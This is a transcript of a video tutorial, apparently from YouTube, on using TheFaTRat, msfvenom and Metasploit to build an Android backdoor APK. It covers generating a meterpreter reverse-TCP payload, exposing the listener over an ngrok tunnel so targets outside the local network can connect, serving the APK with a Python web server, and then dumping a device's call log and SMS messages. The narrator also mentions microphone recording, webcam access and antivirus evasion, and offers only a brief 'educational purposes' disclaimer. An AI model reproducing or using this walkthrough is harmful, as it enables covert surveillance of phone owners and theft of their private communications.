Remote control. In today's video, I'm going to be showing you how you can get full remote control of phones with a super simple tool called TheFaTRat. And just remember, this is simply for educational purposes only and should never be done to harm anyone. Okay, so in front of me, you have the TheFaTRat exploitation tool, which compiles a malware with famous payloads and then can be executed on systems like Linux, Windows, Macs, and even Android systems. The TheFaTRat provides an easy way to create backdoors and payloads which can bypass most antiviruses. Scrolling down, we have the features right here: fully automating MSI Venom and metasploit, generate payloads in various formats, and a lot more features. In the installation guide right here, since I have Kali Linux, I can just copy and paste these commands, but if you're running any other system and having problems with installation, just DM me on Discord, I'm always available. So here, first, git clone the repository. We can either just copy this right here, or we can scroll up to the big green code button and copy the web URL. We copy it in our terminal, we type git clone, and then we paste in the link. After it's done cloning, we head on over to the directory by doing cd of TheFaTRat. Inside, we list the files. And right here, we have our file setup.sh. We need to change the mod to this one to be executable. So change mod plus x for executable setup.sh. And then we run the setup.sh by doing /setup.sh. You need to be root to run the script. So we type sudo su. I give it my password. And then here I just type /setup.sh. After it's done setting up, it's going to ask us about the backdoor factory. We can either install it from the Kali repository, or we can set up a path manually. Choose number 2. We don't need to set up a path manually, so number 2. Then it's going to ask us where we want our generated files, so our payloads, where we want it to be saved at. We can either choose a default one, which is at root fatrat_generated. I don't want that. I'm going to open a new terminal, make it a bit bigger. Here, I'm going to make a new directory, make dir, name it files_generated. Then I'm going to go inside it, files generated. I'm going to print the current working directory, pwd, and then I'm going to copy this right here. Copy section, and I'm going to paste it in right here. I'm going to press enter. Enter again. Now it's asking us if you want to create a shortcut for TheFaTRat in our system so we can run TheFaTRat from anywhere in our terminal or desktop. This is good because we don't have to go in a directory anymore. We can just type TheFaTRat in our terminal and we'll start up. So I'm going to choose yes. Why? Now we completed the installation and the setup. We can just run TheFaTRat because we chose the shortcut, so TheFaTRat, and it starts up the TheFaTRat tool. And now here in the TheFaTRat, here we see a lot of options. For example, create a backdoor, create huge 100% backdoor, load, create auto listeners. We have a lot of options, but our option today is create backdoor with MSI Venom. So we choose option 1. And here we can create a backdoor for Linux, Windows, assign Android, Mac, PHP, ASP, a lot of options. In today's video, we're going to do only Android, but if you want other stuff, just comment down below and I'll make sure to do it. So our option is number 3. And now set lhost IP, set localhost IP. We need to give TheFaTRat an IP to make the connection to. And then here is showing our IPv4 right here and IPv6. We can either just go ahead and copy this and paste it in, and that would be it. That would be way simpler. But the problem is that that's our private IP, not our public IP, meaning only people connected to our network, only people inside our network would be able to call up our file to download our payload, and we would not be able to make a connection with anyone outside our network. And that's a problem. But we have ngrok, a tunneling service. For anyone who doesn't know, it's free. ngrok basically takes our local host through a secure tunnel and hosts it online for anyone to call it, for anyone to download our payload. So head on over to ngrok.com. Here in the login page, log in. Once you do that, you should see something like this. Follow the instructions for your operating system, add your authentication to the terminal. And for this video, we're going to be using TCP, meaning you need to add payment info into your ngrok account. And don't worry, it's not going to charge you anything. This is simply for authentication because ngrok can be used by threat actors. This is just to make sure you're not a threat actor. So in our terminal, after you install it, you just type ngrok TCP 4444, and then we let it run. It runs pretty fast. And if you're skeptical about putting your payment in because you think it's going to charge money to your account, don't worry. You can see right here, whoamitang, plan free. I also didn't pay anything. And then from here, we're only going to need this part right here, and we're going to head and copy it. We head on over to the TheFaTRat, and then we paste it in. Now it's asking for our L port. Here we gave 4444, but ngrok gave us 15346. So we go ahead and copy this as well, and then we paste it in. Now, please enter the base name for your output file. Just give a name for your file. So I'm going to name it payload. It doesn't matter. And now we need to choose a meterpreter or a shell. We're going to use Android meterpreter reverse TCP. This is a persistent connection, so we have a good reverse shell. So we type 3. And this might take a bit to create the backdoor to generate the payload. So you can sit back and relax. Now, do you want to create a listener for this configuration to use MSF console in the future? For this tool, we're going to choose a no, because we're going to do everything manually so you can understand it better. So go ahead and type N, no. Now press enter to return to menu. And now we can check if it was actually downloaded. Remember when we first made TheFaTRat, we gave it a directory to put our payload in. So type ls right here, and right here we see our payload.apk. And now we need to make a Python server so we can call up the file from a different device. And how we do it, we type Python 3-m for module, and Python has a HTTP server module built in. So http.server, and then we need to specify a port. We're going to specify port 90. Usually I specify port 80, but it might be occupied. I'm going to specify port 90, and we press enter, and this shares all our files in our directory, so our payload APK, so we can download it from a different device. So now in our target device, this is an Android emulator. YouTube, this is not a real phone, don't take this down. Now we need to access the server. To do that, we need to type our IP. I'm going to open a new terminal, and I'm going to type if config to see my IP, and right here I see 192.168.178.65. So we head on back, Android emulator, and we give 192.168.178.65 followed by our port we gave to the Python server, so 90. Once we type it right here, we can see in the server that someone went inside the server. And then right here, this small, we cannot see, but it says payload.apk. We click on it to download it. The antivirus of Android is giving us problems, but that's good. So it blocks harmful stuff. We click next and we click install. We don't run it yet because we need to set up the listener. So we just install it, leave this in the background. We install it, and then we head on over to the TheFaTRat. Right here, we click 15 to return back to the main menu. And now here, right here, we can see a number 10, jump to MSF console. And here we need to set up our listener. So number 10, now it launches up MSF console for us. Inside metasploit, we're going to clear this up so it's nice and clear. And inside here, we're going to use the exploit first to catch and manage all the incoming connections. And we're going to use the exploit multi-handler. So use exploit multi-handler. And then if you remember from before, we set a payload in the TheFaTRat tool. We set the payload Android meterpreter reverse TCP. So we set that here as well. Set payload Android slash meterpreter dash reverse underscore TCP. How do we do that? We type options. And here we see metasploit already set a local port, a default port 444. This is good. We don't need to change that, but we need to change the local host. And we type setl host. And then we set it to 0.0.0.0. So to tell meterpreter to listen on all network interfaces. We type set, and then we pull up our target device. And here we press open. And then here we type inside metasploit, we type run, and that's it, all we have to do. Metasploit is going to make a connection with our device, and then we get a full reverse shell. And right here we can see meterpreter opened one session and made a successful connection. Here we got some warnings because MSF is outdated, version mismatch, but that's not important. Here we type help, and we see all the stuff we can do. Here we can see we can do stuff like dump call log, dump contacts, dump SMS, geolocate. We can also do stuff like record mic. We can record their microphone while they have their phone on them. A webcam chat, webcam list. We can see how many webcams they have. We can do screenshot, sysinfo, information on the system. We can do that right now, sysinfo. And right here we see information on the system, Android 8.1.0. But let's do something more interesting. For example, dump call log. We're going to see their call log, whoever they called, what they did. So call log. Fetching 2 entries, it found 2 entries, and it says the call log underscore dump underscore random numbers dot txt. And we can open the TheFaTRat folder inside the TheFaTRat folder. And right here we can see dump call log. We can open it, and right here we see all the people they called, the number, where they did, what it happened, duration, everything. Heading on back, we can do, for example, dump underscore SMS. It fetched 3 SMS messages. We can also check that out. Right here, SMS dump. Let's open it up. And right here, we can see all the SMSs dumped, outgoing, what it said, message, just random letters, because I'm not testing anyone in an Android emulator. So yeah, we can do a lot of stuff. We can do something like geolocate, but since this Android emulator is not going to get any geolocation,